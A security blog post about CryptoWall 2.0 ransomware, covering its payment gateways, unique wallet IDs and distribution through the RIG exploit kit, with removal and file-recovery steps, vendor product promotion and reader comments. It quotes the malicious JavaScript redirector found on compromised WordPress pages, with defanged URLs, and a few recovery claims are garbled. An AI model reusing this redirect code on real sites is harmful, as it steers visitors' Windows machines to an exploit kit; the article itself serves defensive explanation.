Home > Ransomware > Remove CryptoWall 2.0 and Restore the Encrypted Files

Remove CryptoWall 2.0 and Restore the Encrypted Files

The CryptoWall ransomware has been an enormous threat for network administrators and PC users, ever since it was initially released because it encrypts the local data as well as data found on network shares. The new version of the ransomware, CryptoWall 2.0 is now improved, which makes it even more difficult for the user to recover the encrypted files without paying the ransom.

CryptoWall 2.0 – What’s New?

The cyber criminals use their own TOR gateways in the newest CryptoWall version. An individual wallet ID is sent to each separate victim instead of the previously used hard coded links that were the same for nearly all victims. Also, the original unencrypted files are now securely deleted.

Own TOR Gateways

The ransom payment servers of CyptoWall are located on TOR. This allows the ransomware creators to stay hidden from the authorities. For the user to be able to connect to the server, he needs to access the TOR network, and most users find it rather difficult to install TOR in the first place. That is why CryptoWall used a Web-to-TOR gateway which allowed the ransomware victims to access the payment server easily. As the providers of this gateway realized what was happening, they started to blacklist their payment servers so they won’t be used for malicious purposes. The new version of CryptoWall has now its own payment servers – pay2tor.com, tor4pay.com and pay4tor.com.

A Unique Wallet ID for Each Victim

The users who chose to pay the ransom are provided with an individual wallet ID that is unique for each victim. Initially, the users were not presented with this option, which allowed people to steal other user’s payment transactions and use it as their own ransom payments. The unique payment addresses for each victim this is not possible anymore.

The Original Unencrypted Files Are Being Securely Deleted

This is another new feature for the CryptoWall 2.0. In the previous version, the ransomware would encrypt the victim’s data files and then just delete the original ones. This made it possible for data recovery tools to restore the information that was encrypted. This method can no longer be applied as CryptoWall 2.0 securely deletes the victim’s data. This leaves the compromised user with two options only: either to restore the files from backups or to pay the required sum.

CryptoWall 2.0 Distributed Through the RIG Exploit Kit

Security Experts have recently observed hackers exploiting vulnerable WordPress links in order to redirect computer users to servers that are hosting the RIG Exploit Kit. The latter abuses a large number of vulnerabilities in unpatched Flash, Java and many other applications in order to drop the new version of the CryptoWall ransomware. According to Dynamoo’s Blog, the spammers behind this campaign are the same that distributed the recent eFax spam message, but this time they are delivering CryptoWall 2.0 instead. The same blog also reveals the following information:

  • hxxp:// is the server hosting the RIG Exploit Kit.
  • hxxp:// is the exploit redirector.
  • hxxp:// is the spam reported by the blog.

The compromised WordPress links are known to contain this code:

var OSName=”Unknown OS”;
if (navigator.appVersion.indexOf(“Win”)!=-1) OSName=”Windows”; if (navigator.appVersion.indexOf(“Mac”)!=-1) OSName=”MacOS”; if (navigator.appVersion.indexOf(“X11″)!=-1) OSName=”UNIX”; if (navigator.appVersion.indexOf(“Linux”)!=-1) OSName=”Linux”; var1=112; var2=var1;
if(OSName==”Windows”) {location.replace(“hxxp://”);}else{location.replace(“https://google.com/search?q=efax”);}

How to Remove CryptoWall 2.0 and Restore the Encrypted Files

Stage One: Remove CryptoWall 2.0

1. First and most important – download and install a legitimate and trustworthy anti-malware scanner, which will help you run a full system scan and eliminate all threats.donload_now_250
Spy Hunter system scanner will only detect the threat. If you want the threat to be automatically removed, you need to purchase the full version of the malware tool. Find Out More About SpyHunter Anti-Malware Tool

2. Run a second scan to make sure that there are no malicious software programs running on your PC. For that purpose, it’s recommended to download ESET Online Scanner.

Your PC should be clean now.

Stage Two: Restore the Encrypted Files

Option 1: Best case scenario – You have backed up your data on a regular basis, and now you can use the most recent backup to restore your files.

Option 2: Try to decrypt your files with the help of Kaspersky’s RectorDecryptor.exe and RakhniDecryptor.exe. They might help you in the process but keep in mind that they were not specially designed to encrypt information that was decrypted by this particular ransomware.

Option 3: Shadow Volume Copies

1. Install the Shadow Explorer, which is available with Windows Vista, Windows 7, Windows 8 and Windows XP Service Pack 2.

2. From Shadow Explorer’s drop down menu choose a drive and the latest date you would like to restore information from.

3. Right-click on a random encrypted file or folder then select “Export”. Select a location to restore the content of the selected file or folder.

Remove CryptoWall 2.0 Automatically with Spy Hunter Malware – Removal Tool.

Spy Hunter scanner will only detect the threat. If you want the threat to be automatically removed, you need to purchase the full version of the anti-malware tool.Find Out More About SpyHunter Anti-Malware Tool / How to Uninstall SpyHunter


Berta Bilbao

Berta is a dedicated malware researcher, dreaming for a more secure cyber space. Her fascination with IT security began a few years ago when a malware locked her out of her own computer.

More Posts

  1. Avatarrelic99

    The updated version will keep you from running or installing any virus solutions, remove the infected drive and slave it to another computer for scanning. A paid subscription to CryptoPrevent is the only tool I know of to prevent infections of the v2.

    1. AvatarJay

      I ran into what must have been a new variant just a few days ago. I couldn’t eradicate it with the affected windows machine active, so I also slaved the infected drive to a non-infected machine, and proceeded to scan the entire drive with the following: Malwarebytes, Hitman Pro, TDSSKIller, Avast Antivirus, and finally followed up with ESET. And the infection still came back as soon as the machine was connected to the internet, evidently hooking some Internet Explorer process to do so. I could find no DNS alterations, no HOSTS file alterations, and no Winsock hooks or BHOs installed to account for it. I ended up wiping the drive and doing a factory restore. Something I rarely have to do for malware infections. Prior to doing that I attempted to recover files from shadow copies (Win 7 64bit), and none were present as the malware had wiped out the system restore points and all shadow file copies. I luckily was able to recover some files that hadn’t yet been encrypted, so it wasn’t a total loss. This was my first encounter with Cryptowall, and despite following the given advice I had found on removing it on various security forums,it still came back unfortunately. I had to concede defeat. Nasty bug.

  2. AvatarAyesha

    Cryptowall 2.0 is what I got I found out what it was called days later . But it did not delete ? The originals ? As I went to look/ as i used recovery software the best one out there. I got the virus on 11-18-2014

  3. AvatarChris

    I got the virus around 11/11/2014. At least that was the day I found out what it was and turned off my machine and rebooted in safe mode after doing research. Since then I have been trying to figure out how to restore the files that were encrypted. I have 2 months worth of photos that are encrypted, but the info does not add up. I hope someone could shed some light on the problem. If a file is encrypted then would the date modified or created be the date it was encrypted? I tried using Recuva and other software to restore but it says it was not deleted. Any ideas?

  4. AvatarHipolito Gonzalez

    Hola buenos dias, mi pc fe infectada por el virus criptowall v3.0, y mis archivos fueron encriptados con la clave pùblica RSA 2048 y necesito recuperarlos, si alguien me puede ayudar se los agradecere mucho.

    1. Milena DimitrovaMilena Dimitrova

      Hi Hipolito,

      We’re sorry to hear you have been infected with CryptoWall 2.0! Please sensorstechforum.com/forums/ join our forum and read the following topics: sensorstechforum.com/ forums/internet-and-networking-security/help-decrypt-files-encrypted-by-cryptowall-3-0/
      sensorstechforum.com /forums/malware-removal-questions-and-guides/how-to-remove-cryptowall-4-0-and-restore-your-data/

      Unfortunately, RSA-2048 encryption is quite difficult to break. We hope the tools mentioned in the topics help you recover your files! Don’t hesitate to ask us if you have other questions.

      Milena and STF team


Leave a Comment

Your email address will not be published. Required fields are marked *

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share